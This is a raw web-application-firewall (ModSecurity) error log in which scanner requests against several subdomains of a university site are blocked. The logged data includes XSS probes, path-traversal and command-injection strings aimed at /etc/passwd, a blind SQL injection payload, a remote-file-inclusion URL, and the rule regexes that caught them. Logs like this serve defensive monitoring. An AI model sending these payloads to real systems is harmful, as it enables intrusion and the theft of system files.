[Tue Aug 29 11:41:04.388814 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAaZ9m0AAAAo"]
[Tue Aug 29 11:41:04.389131 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAYMWUkAAAAR"]
[Tue Aug 29 11:41:04.401114 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAYf-M0AAAAD"]
[Tue Aug 29 11:41:04.411050 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAaZ9m4AAAAo"]
[Tue Aug 29 11:41:04.425435 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAYf-M4AAAAD"]
[Tue Aug 29 11:41:04.427906 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcvBeUAAAAJ"]
[Tue Aug 29 11:41:04.437212 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcsLEQAAAAE"]
[Tue Aug 29 11:41:04.475227 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcuUmwAAAAI"]
[Tue Aug 29 11:41:04.478727 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO124MCo-f0AAAcsLEYAAAAE"]
[Tue Aug 29 11:41:04.499822 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO124MCo-f0AAAcoNPAAAAAF"]
[Tue Aug 29 11:41:05.355706 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcsLEcAAAAE"]
[Tue Aug 29 11:41:05.371359 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAYf-NAAAAAD"]
[Tue Aug 29 11:41:05.380729 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAYMWVAAAAAR"]
[Tue Aug 29 11:41:05.383753 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcoNPIAAAAF"]
[Tue Aug 29 11:41:05.385254 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcqJH0AAAAG"]
[Tue Aug 29 11:41:05.400480 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcuUnAAAAAI"]
[Tue Aug 29 11:41:05.401001 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAYMWVEAAAAR"]
[Tue Aug 29 11:41:05.409162 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAActbHUAAAAH"]
[Tue Aug 29 11:41:05.420942 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAcuUnEAAAAI"]
[Tue Aug 29 11:41:05.423361 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcoNPQAAAAF"]
[Tue Aug 29 11:41:05.457040 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22Type\\x22:\\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcYU9cAAAAp"]
[Tue Aug 29 11:41:05.475817 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcvBe8AAAAJ"]
[Tue Aug 29 11:41:05.478408 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcYU9gAAAAp"]
[Tue Aug 29 11:41:05.489673 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAActbHgAAAAH"]
[Tue Aug 29 11:41:05.508348 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAcsLE4AAAAE"]
[Tue Aug 29 11:41:05.518488 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcvBfEAAAAJ"]
[Tue Aug 29 11:41:05.525710 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: ,\\x22Message\\x22: found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJEC [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcYU9oAAAAp"]
[Tue Aug 29 11:41:05.531745 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYf-NgAAAAD"]
[Tue Aug 29 11:41:05.533418 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22Type\\x22:\\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: 